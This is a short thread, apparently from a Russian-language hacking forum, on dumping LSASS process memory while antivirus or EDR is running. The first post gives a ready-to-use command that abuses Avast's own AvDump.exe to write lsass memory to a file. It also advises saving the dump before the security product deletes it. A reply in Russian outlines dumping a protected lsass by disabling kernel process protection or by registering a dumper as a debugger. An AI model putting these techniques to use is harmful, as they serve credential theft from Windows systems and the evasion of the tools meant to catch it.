• XSS.stack #1 – первый литературный журнал от юзеров форума

AV\EDR dump lsass with active AV

Install Avast, Get AVDump.exe in the installation directory.
use:
AvDump.exe --pid 980(lsass pid) --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp(custom lsass dmp name)

This method may be effective for you, at least I have used this method to bypass many problems. However, they will delete the exported DMP files, so please download and save the DMP files quickly.
 
Вот разные методы

В случае если lsass запущен как PsProtectedSignerLsa-Light , то подойдет только дамп через драйвер с предварительным отключением в ядре защиты процесса или штатные средства системы
(регистрация дампера как отладчика или пост обработчика при аварийном завершении): https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх